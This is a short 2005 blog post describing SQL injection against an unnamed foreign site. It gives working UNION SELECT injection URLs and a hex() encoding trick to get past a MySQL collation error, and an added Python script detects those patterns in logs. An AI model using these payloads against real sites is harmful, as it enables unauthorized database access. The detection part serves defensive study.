Author: SuperHei
Article type: Original
Published: 2005-10-18
While testing a foreign site:
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
Error returned:
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
It appears this is caused by the character sets (http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html) on the two sides of the UNION query being different.
Solution: convert to another encoding, such as hex.
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
This successfully returned the value of hex(version()):
342E312E332D62657461
Querying it back in MySQL gives:
mysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta             |
+------------------------+
1 row in set (0.00 sec)
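
For detection, both artifacts shown above can be matched in logs: the UNION collation error in application error output, and a hex()-wrapped column in a decoded query string. The following is an added example, not part of the original post; the log format, the path /item.php and the addresses are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Error text MySQL returns when the two sides of a UNION disagree on collation.
COLLATION_ERR = re.compile(
    r"Illegal mix of collations \((\w+),\w+\) and \((\w+),\w+\) "
    r"for operation 'UNION'", re.I)
# UNION SELECT in a decoded query string (whitespace or /**/ as separators).
UNION_SELECT = re.compile(r"\bunion(?:\s|/\*.*?\*/)+select\b", re.I | re.S)
# A function call wrapped in hex(), as in hex(version()).
HEX_WRAPPED = re.compile(r"\bhex\s*\(\s*\w+\s*\(", re.I)
# Query string of a request line in common log format.
REQUEST = re.compile(r'"(?:GET|POST) \S*?\?(\S*) HTTP/[\d.]+"')


def classify_request(log_line):
    """Return the set of indicators found in one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return set()
    query = unquote_plus(m.group(1))  # undo %20 and similar URL encoding
    found = set()
    if UNION_SELECT.search(query):
        found.add("union-select")
        if HEX_WRAPPED.search(query):
            found.add("hex-wrapped-column")
    return found


def collation_mismatch(error_line):
    """Return (left, right) collations if the line is the UNION collation error."""
    m = COLLATION_ERR.search(error_line)
    return (m.group(1), m.group(2)) if m else None


# Constructed sample lines; path and addresses are placeholders.
ACCESS_LOG = [
    '192.0.2.10 - - [18/Oct/2005:10:00:01 +0000] "GET /item.php?c_id=2 HTTP/1.1" 200 512',
    '192.0.2.77 - - [18/Oct/2005:10:00:05 +0000] "GET /item.php?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/* HTTP/1.1" 200 311',
    '192.0.2.77 - - [18/Oct/2005:10:00:09 +0000] "GET /item.php?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/* HTTP/1.1" 200 530',
]
ERROR_LOG = ["Illegal mix of collations (euckr_korean_ci,IMPLICIT) and "
             "(utf8_general_ci,IMPLICIT) for operation 'UNION'"]

if __name__ == "__main__":
    for line in ACCESS_LOG:
        print(sorted(classify_request(line)), line.split('"')[1][:60])
    for line in ERROR_LOG:
        print("collation mismatch:", collation_mismatch(line))
```

A collation error followed shortly by a hex()-wrapped UNION request from the same client is a stronger signal than either indicator alone.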